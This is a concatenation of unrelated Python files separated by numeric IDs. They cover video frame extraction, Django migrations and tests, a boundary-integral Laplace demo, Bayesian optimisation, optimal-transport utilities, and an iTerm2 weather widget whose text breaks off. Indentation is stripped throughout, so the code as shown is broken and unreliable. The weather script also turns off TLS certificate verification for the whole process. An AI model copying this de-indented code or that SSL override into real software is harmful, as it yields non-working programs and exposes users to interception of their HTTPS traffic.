print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.avi'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
def main_kinetics400(v_root, f_root, dim=128):
print('extracting Kinetics400 ... ')
for basename in ['train', 'val']:
v_root_real = v_root + '/' + basename
if not os.path.exists(v_root_real):
print('Wrong v_root'); sys.exit()
f_root_real = f_root + '/' + basename
print('Extract to: \nframe: %s' % f_root_real)
if not os.path.exists(f_root_real):
os.makedirs(f_root_real)
v_act_root = glob.glob(os.path.join(v_root_real, '*/'))
v_act_root = sorted(v_act_root)
# if resume, remember to delete the last video folder
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.mp4'))
v_paths = sorted(v_paths)
# for resume:
v_class = j.split('/')[-2]
out_dir = os.path.join(f_root_real, v_class)
if os.path.exists(out_dir): print(out_dir, 'exists!'); continue
print('extracting: %s' % v_class)
# dim = 150 (crop to 128 later) or 256 (crop to 224 later)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root_real, dim=dim) for p in tqdm(v_paths, total=len(v_paths)))
def main_Panasonic(v_root, f_root):
print('extracting Panasonic ... ')
print('extracting videos from %s' % v_root)
print('frame save to %s' % f_root)
if not os.path.exists(f_root): os.makedirs(f_root)
v_act_root = glob.glob(os.path.join(v_root, '*/'))
print(len(v_act_root))
for i, j in tqdm(enumerate(v_act_root), total=len(v_act_root)):
v_paths = glob.glob(os.path.join(j, '*.mkv'))
v_paths = sorted(v_paths)
Parallel(n_jobs=32)(delayed(extract_video_opencv)(p, f_root) for p in tqdm(v_paths, total=len(v_paths)))
if __name__ == '__main__':
# v_root is the video source path, f_root is where to store frames
# edit 'your_path' here:
#dataset_path = '/vision/u/nishantr/data'
parser = argparse.ArgumentParser()
parser.add_argument('--ucf101', default=False, type=str2bool)
parser.add_argument('--jhmdb', default=False, type=str2bool)
parser.add_argument('--hmdb51', default=False, type=str2bool)
parser.add_argument('--kinetics', default=False, type=str2bool)
parser.add_argument('--panasonic', default=False, type=str2bool)
parser.add_argument('--dataset_path', default='/scr/nishantr/data', type=str)
parser.add_argument('--dim', default=128, type=int)
args = parser.parse_args()
dataset_path = args.dataset_path
if args.ucf101:
main_UCF101(v_root=dataset_path + '/ucf101/videos/', f_root=dataset_path + '/ucf101/frame/')
if args.jhmdb:
main_JHMDB(v_root=dataset_path + '/jhmdb/videos/', f_root=dataset_path + '/jhmdb/frame/')
if args.hmdb51:
main_HMDB51(v_root=dataset_path+'/hmdb/videos', f_root=dataset_path+'/hmdb/frame')
if args.panasonic:
main_Panasonic(v_root=dataset_path+'/action_split_data/V1.0', f_root=dataset_path+'/frame', dim=256)
if args.kinetics:
if args.dim == 256:
main_kinetics400(
v_root=dataset_path + '/kinetics/video', f_root=dataset_path + '/kinetics/frame256', dim=args.dim
)
else:
assert args.dim == 128, "Invalid dim: {}".format(args.dim)
main_kinetics400(v_root=dataset_path+'/kinetics/video', f_root=dataset_path+'/kinetics/frame', dim=128)
# main_kinetics400(v_root='your_path/Kinetics400_256/videos',
# f_root='your_path/Kinetics400_256/frame', dim=256)
|
69200
|
import requests
from io import BytesIO
from PIL import Image
def get_user_image(url):
response = requests.get(url)
img_file = BytesIO(response.content)
return Image.open(img_file)
def get_user_details(username):
res = requests.get(f'https://api.github.com/users/{username}')
return res.json() if res.status_code == 200 else None
def replace_space(string, idx):
return string[:idx] + '\n' + string[idx+1:] if idx > -1 else string
def insert_new_line(string):
return replace_space(
replace_space(string, string.find(' ', 53)), string.find(' ', 106)
)
|
69264
|
from django.db import migrations
INSTANCE_TYPE = 'OpenStackTenant.Instance'
VOLUME_TYPE = 'OpenStackTenant.Volume'
def change_billing_types(apps, schema_editor):
Offering = apps.get_model('marketplace', 'Offering')
OfferingComponent = apps.get_model('marketplace', 'OfferingComponent')
for offering in Offering.objects.filter(
type__in=(INSTANCE_TYPE, VOLUME_TYPE)
).all():
components = offering.components.filter(type__startswith='gigabytes_')
if components:
for component in components:
component.type = OfferingComponent.BillingTypes.FIXED
component.save(update_fields=['type'])
class Migration(migrations.Migration):
dependencies = [
('marketplace_openstack', '0005_change_private_offerings_customers')
]
operations = [migrations.RunPython(change_billing_types)]
|
69280
|
import numpy as np
import scipy as sp
import scipy.sparse
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.path
import time
plt.ion()
import pybie2d
"""
Demonstrate how to use the pybie2d package to solve an interior Laplace problem
On a complicated domain using a global quadrature
This example demonstrates how to do this entirely using low-level routines,
To demonstrate both how to use these low level routines
And to give you an idea what is going on under the hood in the
higher level routines
"""
NG = 100
h_max = 0.01
# extract some functions for easy calling
PPB = pybie2d.boundaries.panel_polygon_boundary.panel_polygon_boundary.Panel_Polygon_Boundary
Grid = pybie2d.grid.Grid
PointSet = pybie2d.point_set.PointSet
Laplace_Layer_Form = pybie2d.kernels.high_level.laplace.Laplace_Layer_Form
Laplace_Layer_Singular_Form = pybie2d.kernels.high_level.laplace.Laplace_Layer_Singular_Form
Laplace_Layer_Apply = pybie2d.kernels.high_level.laplace.Laplace_Layer_Apply
Cauchy_Layer_Apply = pybie2d.kernels.high_level.cauchy.Cauchy_Layer_Apply
Find_Near_Points = pybie2d.misc.near_points.find_near_points
Pairing = pybie2d.pairing.Pairing
################################################################################
# define problem
# boundary
boundary = PPB([0,1,1,0], [0,0,1,1], [h_max]*4, [True]*4)
# solution
solution_func = lambda x, y: 2*x + y
bc = solution_func(boundary.x, boundary.y)
def err_plot(up):
# compute the error
errorp = up - solution_func(full_grid.xg[phys], full_grid.yg[phys])
digitsp = -np.log10(np.abs(errorp)+1e-16)
digits = np.zeros_like(full_grid.xg)
digits[phys] = digitsp
mdigits = np.ma.array(digits, mask=ext)
# plot the error as a function of space (only good in interior)
fig, ax = plt.subplots(1,1)
clf = ax.imshow(mdigits[:,::-1].T, extent=[0,1,0,1],
cmap=mpl.cm.viridis_r)
ax.set_aspect('equal')
fig.colorbar(clf)
print('Error: {:0.2e}'.format(np.abs(errorp).max()))
################################################################################
##### solve problem the hard way ###############################################
################################################################################
################################################################################
# find physical region
# (this implements a fast way to tell if points are in or out of the boundary)
# (and of course, for the squish boundary, we could easily figure out something
# faster, but this illustrates a general purpose routine)
full_grid = Grid([0,1], NG, [0,1], NG, x_endpoints=[False,False], y_endpoints=[False,False])
# this is hiding a lot of stuff!
phys, ext = boundary.find_interior_points(full_grid)
phys = full_grid.reshape(phys)
ext = full_grid.reshape(ext)
################################################################################
# solve for the density
DLP = Laplace_Layer_Singular_Form(boundary, ifdipole=True)
A = -0.5*np.eye(boundary.N) + DLP
AI = np.linalg.inv(A)
tau = AI.dot(bc)
################################################################################
# naive evaluation
# generate a target for the physical grid
gridp = Grid([0,1], NG, [0,1], NG, mask=phys, x_endpoints=[False,False], y_endpoints=[False,False])
# evaluate at the target points
u = np.zeros_like(gridp.xg)
up = Laplace_Layer_Apply(boundary, gridp, dipstr=tau)
err_plot(up)
################################################################################
# use the oversampling features
hmax = gridp.xg[1,0] - gridp.xg[0,0]
fbdy, IMAT = boundary.prepare_oversampling(hmax/6.0)
IMAT = sp.sparse.csr_matrix(IMAT)
ftau = IMAT.dot(tau)
up = Laplace_Layer_Apply(fbdy, gridp, dipstr=ftau)
err_plot(up)
|
69359
|
from SDLInterface import SDLInterface
from abc import abstractmethod
class InterfaceGenerator:
def __init__(self):
pass
@abstractmethod
def add_interface(self, sdl_interface: SDLInterface):
pass
@abstractmethod
def generate(self, output_directory):
pass
@abstractmethod
def name(self):
pass
|
69411
|
from responsebot.handlers import BaseTweetHandler, register_handler
@register_handler
class HandlerClassInInit(BaseTweetHandler):
def on_tweet(self, tweet):
print('HandlerClassInInit')
|
69504
|
from __future__ import unicode_literals
import sys
import django
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from object_tools import autodiscover
from object_tools.sites import ObjectTools
from object_tools.tests.tools import TestTool, TestInvalidTool
from object_tools.validation import validate
class InitTestCase(TestCase):
"""
Test that tool modules are imported after autodiscover()
"""
def test_autodiscover(self):
autodiscover()
self.assertTrue(
'object_tools.tests.tools' in list(sys.modules.keys()),
'Autodiscover should import tool modules from installed apps.'
)
class ValidateTestCase(TestCase):
"""
Test object tool validation.
Each object tool should have name and a label attribute.
Each object tool should also define a view method.
ImproperlyConfigured exception is raised for missing name and/or label.
NotImplementedError is raised if a view is not defined.
"""
def test_validation(self):
# Fail without 'name' member.
self.assertRaises(
ImproperlyConfigured, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except ImproperlyConfigured as e:
message = str(e)
self.assertEqual(
message, "No 'name' attribute found for tool TestInvalidTool."
)
TestInvalidTool.name = 'test_invalid_tool'
# Fail without 'label' member.
self.assertRaises(
ImproperlyConfigured, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except ImproperlyConfigured as e:
message = str(e)
self.assertEqual(
message,
"No 'label' attribute found for tool TestInvalidTool."
)
TestInvalidTool.label = 'Test Invalid Tool'
# Fail without 'view' member.
self.assertRaises(
NotImplementedError, validate, TestInvalidTool, User
)
try:
validate(TestInvalidTool, User)
except NotImplementedError as e:
message = str(e)
self.assertEqual(
message, "No 'view' method found for tool TestInvalidTool."
)
class ObjectToolsTestCase(TestCase):
"""
Testcase for object_tools.sites.ObjectTools.
"""
def test_init(self):
# Check init results in expected members.
tools = ObjectTools()
self.assertEqual(tools.name, 'object-tools')
self.assertEqual(tools.app_name, 'object-tools')
self.assertEqual(tools._registry, {})
def test_register(self):
# Set DEBUG = True so validation is triggered.
from django.conf import settings
settings.DEBUG = True
tools = ObjectTools()
tools.register(TestTool)
def test_urls(self):
tools = ObjectTools()
# Without any tools should be empty list, namespaces
# should be 'object-tools'.
self.assertEqual(tools.urls, ([], 'object-tools', 'object-tools'))
# With a tool registered, urls should include it for each model.
tools.register(TestTool)
urls = tools.urls
self.assertEqual(len(urls[0]), 6)
if django.VERSION >= (2, 0):
urlpatterns = [
"<URLPattern '^test_tool/$' [name='sessions_session_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_user_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_group_test_tool']>",
"<URLPattern '^test_tool/$' [name='auth_permission_test_tool']>",
"<URLPattern '^test_tool/$' [name='contenttypes_contenttype_test_tool']>",
"<URLPattern '^test_tool/$' [name='admin_logentry_test_tool']>",
]
else:
urlpatterns = [
'<RegexURLPattern sessions_session_test_tool ^test_tool/$>',
'<RegexURLPattern auth_user_test_tool ^test_tool/$>',
'<RegexURLPattern auth_group_test_tool ^test_tool/$>',
'<RegexURLPattern auth_permission_test_tool ^test_tool/$>',
'<RegexURLPattern contenttypes_contenttype_test_tool ^test_tool/$>',
'<RegexURLPattern admin_logentry_test_tool ^test_tool/$>'
]
for url in urls[0]:
self.assertTrue(url.url_patterns[0].__repr__() in urlpatterns)
|
69516
|
from utilities.analisys_parser.analizer.abstract.expression import Expression, TYPE
from utilities.analisys_parser.analizer.abstract import expression
from utilities.analisys_parser.analizer.reports import Nodo
from utilities.analisys_parser.analizer.statement.expressions import primitive
class Relational(Expression):
"""
Esta clase contiene las expresiones binarias de comparacion
que devuelven un booleano.
"""
def __init__(self, exp1, exp2, operator, row, column):
super().__init__(row, column)
self.exp1 = exp1
self.exp2 = exp2
self.operator = operator
self.temp = exp1.temp + str(operator) + exp2.temp
def execute(self, environment):
exp1 = self.exp1.execute(environment)
exp2 = self.exp2.execute(environment)
operator = self.operator
try:
if operator == "<":
value = exp1.value < exp2.value
elif operator == ">":
value = exp1.value > exp2.value
elif operator == ">=":
value = exp1.value >= exp2.value
elif operator == "<=":
value = exp1.value <= exp2.value
elif operator == "=":
value = exp1.value == exp2.value
elif operator == "!=":
value = exp1.value != exp2.value
elif operator == "<>":
value = exp1.value != exp2.value
elif operator == "ISDISTINCTFROM":
value = exp1.value != exp2.value
elif operator == "ISNOTDISTINCTFROM":
value = exp1.value == exp2.value
else:
expression.list_errors.append(
"Error: 22P02: entrada invalida: "
+ str(exp1.type)
+ " "
+ str(operator)
+ " "
+ str(exp2.type)
+ "\n En la linea: "
+ str(self.row)
)
raise Exception
return primitive.Primitive(
TYPE.BOOLEAN, value, self.temp, self.row, self.column
)
except TypeError:
expression.list_errors.append(
"Error: 42883: la operacion no existe entre: "
+ str(exp1.type)
+ " "
+ str(operator)
+ " "
+ str(exp2.type)
+ "\n En la linea: "
+ str(self.row)
)
raise Exception
except:
expression.list_errors.append(
"Error: XX000: Error interno (Binary Relational Operation)"
+ "\n En la linea: "
+ str(self.row)
)
def dot(self):
n1 = self.exp1.dot()
n2 = self.exp2.dot()
new = Nodo.Nodo(self.operator)
new.addNode(n1)
new.addNode(n2)
return new
|
69584
|
import peewee
import playhouse.pool
# This is just one example of one of the support databases
# see https://docs.peewee-orm.com/en/latest/peewee/database.html
db = peewee.MySQLDatabase()
conn = db.connection()
cursor = conn.cursor()
cursor.execute("sql") # $ getSql="sql"
cursor = db.cursor()
cursor.execute("sql") # $ getSql="sql"
db.execute_sql("sql") # $ getSql="sql"
# Pool extension
pool = playhouse.pool.PooledMySQLDatabase(...)
pool.execute_sql("sql") # $ getSql="sql"
|
69602
|
import sys
import time
import argparse
import os
import torch
from GPmodel.kernels.mixeddiffusionkernel import MixedDiffusionKernel
from GPmodel.models.gp_regression import GPRegression
from GPmodel.sampler.sample_mixed_posterior import posterior_sampling
from GPmodel.sampler.tool_partition import group_input
from GPmodel.inference.inference import Inference
from acquisition.acquisition_optimization import next_evaluation
from acquisition.acquisition_functions import expected_improvement
from acquisition.acquisition_marginalization import inference_sampling
from config import experiment_directory
from utils import model_data_filenames, load_model_data, displaying_and_logging
from experiments.random_seed_config import generate_random_seed_coco
from experiments.test_functions.mixed_integer import MixedIntegerCOCO
from experiments.test_functions.weld_design import Weld_Design
from experiments.test_functions.speed_reducer import SpeedReducer
from experiments.test_functions.pressure_vessel_design import Pressure_Vessel_Design
# from experiments.test_functions.push_robot_14d import Push_robot_14d
from experiments.test_functions.nn_ml_datasets import NN_ML_Datasets
from experiments.test_functions.em_func import EM_func
def HyBO(objective=None, n_eval=200, path=None, parallel=False, store_data=True, problem_id=None, **kwargs):
"""
:param objective:
:param n_eval:
:param path:
:param parallel:
:param kwargs:
:return:
"""
acquisition_func = expected_improvement
n_vertices = adj_mat_list = None
eval_inputs = eval_outputs = log_beta = sorted_partition = lengthscales = None
time_list = elapse_list = pred_mean_list = pred_std_list = pred_var_list = None
if objective is not None:
exp_dir = experiment_directory()
objective_id_list = [objective.__class__.__name__]
if hasattr(objective, 'random_seed_info'):
objective_id_list.append(objective.random_seed_info)
if hasattr(objective, 'data_type'):
objective_id_list.append(objective.data_type)
objective_id_list.append('HyBO')
if problem_id is not None:
objective_id_list.append(problem_id)
objective_name = '_'.join(objective_id_list)
model_filename, data_cfg_filaname, logfile_dir = model_data_filenames(exp_dir=exp_dir,
objective_name=objective_name)
n_vertices = objective.n_vertices
adj_mat_list = objective.adjacency_mat
grouped_log_beta = torch.ones(len(objective.fourier_freq))
log_order_variances = torch.zeros((objective.num_discrete + objective.num_continuous))
fourier_freq_list = objective.fourier_freq
fourier_basis_list = objective.fourier_basis
suggested_init = objective.suggested_init # suggested_init should be 2d tensor
n_init = suggested_init.size(0)
num_discrete = objective.num_discrete
num_continuous = objective.num_continuous
lengthscales = torch.zeros((num_continuous))
print("******************* initializing kernel ****************")
kernel = MixedDiffusionKernel(log_order_variances=log_order_variances, grouped_log_beta=grouped_log_beta, fourier_freq_list=fourier_freq_list,
fourier_basis_list=fourier_basis_list, lengthscales=lengthscales,
num_discrete=num_discrete, num_continuous=num_continuous)
surrogate_model = GPRegression(kernel=kernel)
eval_inputs = suggested_init
eval_outputs = torch.zeros(eval_inputs.size(0), 1, device=eval_inputs.device)
for i in range(eval_inputs.size(0)):
eval_outputs[i] = objective.evaluate(eval_inputs[i])
assert not torch.isnan(eval_outputs).any()
log_beta = eval_outputs.new_zeros(num_discrete)
log_order_variance = torch.zeros((num_discrete + num_continuous))
sorted_partition = [[m] for m in range(num_discrete)]
lengthscale = torch.zeros((num_continuous))
time_list = [time.time()] * n_init
elapse_list = [0] * n_init
pred_mean_list = [0] * n_init
pred_std_list = [0] * n_init
pred_var_list = [0] * n_init
surrogate_model.init_param(eval_outputs)
print('(%s) Burn-in' % time.strftime('%H:%M:%S', time.localtime()))
sample_posterior = posterior_sampling(surrogate_model, eval_inputs, eval_outputs, n_vertices, adj_mat_list, log_order_variance,
log_beta, lengthscale, sorted_partition, n_sample=1, n_burn=1, n_thin=1)
log_order_variance = sample_posterior[1][0]
log_beta = sample_posterior[2][0]
lengthscale = sample_posterior[3][0]
sorted_partition = sample_posterior[4][0]
print('')
else:
surrogate_model, cfg_data, logfile_dir = load_model_data(path, exp_dir=experiment_directory())
for _ in range(n_eval):
start_time = time.time()
reference = torch.min(eval_outputs, dim=0)[0].item()
print('(%s) Sampling' % time.strftime('%H:%M:%S', time.localtime()))
sample_posterior = posterior_sampling(surrogate_model, eval_inputs, eval_outputs, n_vertices, adj_mat_list, log_order_variance,
log_beta, lengthscale, sorted_partition, n_sample=10, n_burn=0, n_thin=1)
hyper_samples, log_order_variance_samples, log_beta_samples, lengthscale_samples, partition_samples, freq_samples, basis_samples, edge_mat_samples = sample_posterior
log_order_variance = log_order_variance_samples[-1]
log_beta = log_beta_samples[-1]
lengthscale = lengthscale_samples[-1]
sorted_partition = partition_samples[-1]
print('\n')
# print(hyper_samples[0])
# print(log_order_variance)
# print(log_beta)
# print(lengthscale)
# print(sorted_partition)
# print('')
x_opt = eval_inputs[torch.argmin(eval_outputs)]
inference_samples = inference_sampling(eval_inputs, eval_outputs, n_vertices,
hyper_samples, log_order_variance_samples, log_beta_samples, lengthscale_samples, partition_samples,
freq_samples, basis_samples, num_discrete, num_continuous)
suggestion = next_evaluation(objective, x_opt, eval_inputs, inference_samples, partition_samples, edge_mat_samples,
n_vertices, acquisition_func, reference, parallel)
next_eval, pred_mean, pred_std, pred_var = suggestion
processing_time = time.time() - start_time
print("next_eval", next_eval)
eval_inputs = torch.cat([eval_inputs, next_eval.view(1, -1)], 0)
eval_outputs = torch.cat([eval_outputs, objective.evaluate(eval_inputs[-1]).view(1, 1)])
assert not torch.isnan(eval_outputs).any()
time_list.append(time.time())
elapse_list.append(processing_time)
pred_mean_list.append(pred_mean.item())
pred_std_list.append(pred_std.item())
pred_var_list.append(pred_var.item())
displaying_and_logging(logfile_dir, eval_inputs, eval_outputs, pred_mean_list, pred_std_list, pred_var_list,
time_list, elapse_list, hyper_samples, log_beta_samples, lengthscale_samples, log_order_variance_samples, store_data)
print('Optimizing %s with regularization %.2E up to %4d visualization random seed : %s'
% (objective.__class__.__name__, objective.lamda if hasattr(objective, 'lamda') else 0, n_eval,
objective.random_seed_info if hasattr(objective, 'random_seed_info') else 'none'))
if __name__ == '__main__':
parser_ = argparse.ArgumentParser(
description='Hybrid Bayesian optimization using additive diffusion kernels')
parser_.add_argument('--n_eval', dest='n_eval', type=int, default=220)
parser_.add_argument('--objective', dest='objective')
parser_.add_argument('--problem_id', dest='problem_id', type=str, default=None)
args_ = parser_.parse_args()
kwag_ = vars(args_)
objective_ = kwag_['objective']
print(kwag_)
for i in range(25):
if objective_ == 'coco':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = MixedIntegerCOCO(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'weld_design':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = Weld_Design(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'speed_reducer':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = SpeedReducer(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'pressure_vessel':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = Pressure_Vessel_Design(random_seed_, problem_id=kwag_['problem_id'])
#elif objective_ == 'push_robot':
# random_seed_ = sorted(generate_random_seed_coco())[i]
# kwag_['objective'] = Push_robot_14d(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'em_func':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = EM_func(random_seed_, problem_id=kwag_['problem_id'])
elif objective_ == 'nn_ml_datasets':
random_seed_ = sorted(generate_random_seed_coco())[i]
kwag_['objective'] = NN_ML_Datasets(random_seed_, problem_id=kwag_['problem_id'])
else:
raise NotImplementedError
HyBO(**kwag_)
|
69633
|
import torch
def scal(a, f):
return torch.sum(a * f, dim=1)
def check_cost_consistency(x, y, C):
mask = (
(x.size()[0] == C.size()[0])
& (x.size()[1] == C.size()[1])
& (y.size()[2] == C.size()[2])
)
if not mask:
raise Exception(
"Dimension of cost C inconsistent with input "
"tensor dimension (x,y)"
)
def dist_matrix(x_i, y_j, p):
if p == 1:
return (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3)
elif p == 2:
return (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3) ** 2
else:
C_e = (x_i[:, :, None, :] - y_j[:, None, :, :]).norm(p=2, dim=3)
return C_e ** (p)
def euclidean_cost(p):
def cost(x, y):
return dist_matrix(x, y, p)
return cost
def convolution(a, x, b, y, cost):
C = cost(x, y)
return (
torch.bmm(C, b[:, :, None]).squeeze(),
torch.bmm(C.transpose(1, 2), a[:, :, None]).squeeze(),
)
def softmin(a_i, C, b_j=None):
"""
Outputs the fixed point mapping (S_x, S_y) of Sinkhorn iterations, i.e.
mappings such that at convergence, f = S_y(g) and g = S_x(f).
"""
a_i_log = a_i.log()
def softmin_x(f_i, ep):
return -ep * (
(f_i / ep + a_i_log)[:, None, :] - C.transpose(1, 2) / ep
).logsumexp(dim=2)
if b_j is not None:
b_j_log = b_j.log()
def softmin_y(f_j, ep):
return -ep * ((f_j / ep + b_j_log)[:, None, :] - C / ep).logsumexp(
dim=2
)
return softmin_x, softmin_y
else:
return softmin_x, None
def exp_softmin(a_i, K, b_j=None):
"""
Outputs the fixed point mapping (S_x, S_y) of Sinkhorn iterations, i.e.
mappings such that at convergence, f = S_y(g) and g = S_x(f).
Exponential form which is not stabilized.
"""
def softmin_x(f_i):
return torch.einsum("ijk,ij->ik", K, f_i * a_i)
if b_j is not None:
def softmin_y(f_j):
return torch.einsum("ijk,ik->ij", K, f_j * b_j)
return softmin_x, softmin_y
else:
return softmin_x, None
def generate_measure(n_batch, n_sample, n_dim):
"""
Generate a batch of probability measures in R^d sampled over
the unit square
:param n_batch: Number of batches
:param n_sample: Number of sampling points in R^d
:param n_dim: Dimension of the feature space
:return: A (Nbatch, Nsample, Ndim) torch.Tensor
"""
m = torch.distributions.exponential.Exponential(1.0)
a = m.sample(torch.Size([n_batch, n_sample]))
a = a / a.sum(dim=1)[:, None]
m = torch.distributions.uniform.Uniform(0.0, 1.0)
x = m.sample(torch.Size([n_batch, n_sample, n_dim]))
return a, x
def generate_gaussian_measure(n_batch, n_sample, n_dim):
a = torch.ones(n_batch, n_sample)
a = a / a.sum(dim=1)[:, None]
m = torch.distributions.normal.Normal(0.0, 1.0)
x = m.sample(torch.Size([n_batch, n_sample, n_dim]))
return a, x
|
69646
|
from typing import Any
from talon import Module
mod = Module()
mod.list(
"cursorless_to_raw_selection",
desc="Cursorless modifier that converts its input to a raw selection.",
)
@mod.capture(rule="{user.cursorless_to_raw_selection}")
def cursorless_to_raw_selection(m) -> dict[str, Any]:
return {"type": "toRawSelection"}
|
69681
|
from abc import ABC, abstractmethod
from typing import Dict
from mlagents.envs import AllBrainInfo, BrainParameters
class BaseUnityEnvironment(ABC):
@abstractmethod
def step(self, vector_action=None, memory=None, text_action=None, value=None) -> AllBrainInfo:
pass
@abstractmethod
def reset(self, config=None, train_mode=True) -> AllBrainInfo:
pass
@property
@abstractmethod
def global_done(self):
pass
@property
@abstractmethod
def external_brains(self) -> Dict[str, BrainParameters]:
pass
@property
@abstractmethod
def reset_parameters(self) -> Dict[str, str]:
pass
@abstractmethod
def close(self):
pass
|
69800
|
import json
import traceback
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from pathlib import Path
from typing import Union
from urllib import request as urlreq, parse as urlparse
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import iterm2
class WeatherInfo:
APIKEY = ''
CITYNAME = 'Shibuya'
UNITS = 'metric' # available units: metric, standard, imperial
ENDPOINT = 'https://api.openweathermap.org/data/2.5'
CURRENT_WEATHER_URL = '/weather'
FORECAST_URL = '/forecast'
ICON2CHAR = {
'01': '\uED98',
'02': '\uED94',
'03': '\uED8F',
'04': '\uED96',
'09': '\uED95',
'10': '\uED95',
'11': '\uED92',
'13': '\uED97',
'50': '\uED90',
}
NA = 'N/A'
def __init__(self, tz='JST', hours=9):
self.tz = timezone(timedelta(hours=hours), tz)
self.current_weather = None
self.forecast_weather = None
self.fetch_status = None
self.lat = f'{self.NA}'
self.lon = f'{self.NA}'
self.dt = f'{self.NA}'
self.wc = f'{self.NA}'
self.wcd = f'{self.NA}'
self.wci = f'02d'
self.tc = f'{self.NA}'
self.tcs = f'{self.NA}'
self.w3 = f'{self.NA}'
self.w3d = f'{self.NA}'
self.w3i = f'02d'
self.t3 = f'{self.NA}'
self.t3s = f'{self.NA}'
def build_url(self, mode='current') -> str:
params = self.build_params()
if mode == 'current':
url = f'{self.ENDPOINT}{self.CURRENT_WEATHER_URL}?{urlparse.urlencode(params)}'
elif mode == 'forecast':
url = f'{self.ENDPOINT}{self.FORECAST_URL}?{urlparse.urlencode(params)}'
else:
raise ValueError(f'Invalid mode={mode}: choose from `current` or `forecast`.')
return url
def build_params(self) -> dict:
return {
'q': self.CITYNAME,
'APPID': self.APIKEY,
'units': self.UNITS
}
def fetch_weather(self):
try:
with urlreq.urlopen(urlreq.Request(self.build_url('current'))) as res:
self.current_weather = json.load(res)
with urlreq.urlopen(urlreq.Request(self.build_url('forecast'))) as res:
self.forecast_weather = json.load(res)
self.fetch_status = 'SUCCEEDED'
except:
print(f'[ERROR] Fetch failed: {traceback.format_exc()}')
self.fetch_status = 'FAILED'
def parse_weather(self):
try:
self.lat = self.current_weather['coord']['lat']
self.lon = self.current_weather['coord']['lon']
self.dt = datetime.fromtimestamp(self.current_weather['dt'], self.tz)
self.wc = f"{self.current_weather['weather'][0]['main']}"
self.wcd = f"{self.current_weather['weather'][0]['description']}"
self.wci = self.current_weather['weather'][0]['icon']
self.tc = self.current_weather['main']['temp']
self.tcs = f'{self.tc:.1f}'
self.w3 = f"{self.forecast_weather['list'][0]['weather'][0]['main']}"
self.w3d = f"{self.forecast_weather['list'][0]['weather'][0]['description']}"
self.w3i = self.forecast_weather['list'][0]['weather'][0]['icon']
self.t3 = self.forecast_weather['list'][0]['main']['temp']
self.t3s = f'{self.t3:.1f}'
except:
print(f'[ERROR] Something goes wrong: {traceback.format_exc()}')
def get_char(self, icon: str) -> str:
icon = icon[:2]
if icon not in self.ICON2CHAR:
return self.NA
return self.ICON2CHAR[icon]
def print_weather_summary(self):
print(f'Fetch Status: {self.fetch_status}')
print(f'City: {self.CITYNAME} ({self.lat}, {self.lon})')
print()
print('=== weather info ===')
print(f'Datetime: {self.dt}')
print(f'Current Weather: {self.get_char(self.wci)} {self.wc} - {self.wcd}')
print(f'Current Temperature: \uED0E {self.tc}')
print(f'3hrs Weather: {self.get_char(self.w3i)} {self.w3} - {self.w3d}')
print(f'3hrs Temperature: \uED0E {self.t3}')
def iterm_format(self, use_icon=True, show_forecast=True) -> str:
sep = '\uEB5E' if use_icon else '▶'
th_char = '\uED0E ' if use_icon else ''
unit = ''
wc_char = f'{self.get_char(self.wci)} ' if use_icon else ''
w3_char = f'{self.get_char(self.w3i)} ' if use_icon else ''
weather_now = f'{wc_char}{self.wc} {th_char}{self.tcs}{unit}'
forecast = f' {sep} {w3_char}{self.w3} {th_char}{self.t3s}{unit}'
if show_forecast:
text = weather_now + forecast
else:
text = weather_now
return text
@dataclass
class KnobOption:
name: str
v: Union[str, bool]
async def main(connection):
knob_city = KnobOption('city', 'Shibuya')
knob_use_icon = KnobOption('use_icon', True)
knob_use_imperial = KnobOption('use_imperial', False)
knob_show_forecast = KnobOption('show_forecast', True)
knobs = [
iterm2.StringKnob('City', knob_city.v, knob_city.v, knob_city.name),
iterm2.CheckboxKnob('Use icon', knob_use_icon.v, knob_use_icon.name),
iterm2.CheckboxKnob('Show forecast', knob_show_forecast.v, knob_show_forecast.name),
iterm2.CheckboxKnob('Use imperial units', knob_use_imperial.v, knob_use_imperial.name),
]
component = iterm2.StatusBarComponent(
short_description='Weather Info',
detailed_description='A component that will tell you the current weather and the forecast.',
knobs=knobs,
exemplar=' Clouds 27.1 Clear 30.2',
update_cadence=60,
identifier='peinan.weather'
)
def have_log():
return LOGFILE_PATH.exists()
def is_refresh_time():
return datetime.now().minute % 10 == 0
def is_opt_modify(knobs):
opt_set = { k.name for k in [knob_city, knob_use_icon, knob_use_imperial, knob_show_forecast] }
if set(knobs.keys()) & opt_set == opt_set:
return True
return False
def read_log():
return json.load(LOGFILE_PATH.open())
def write_log(city: str, use_icon: bool, units: str, show_forecast: bool, weather_info: str):
log_data = {
'city': city,
'use_icon': use_icon,
'units': units,
'show_forecast': show_forecast,
'weather_info': weather_info
}
json.dump(log_data, LOGFILE_PATH.open('w'), ensure_ascii=False)
def knob_value(knobs, option: KnobOption, default_value):
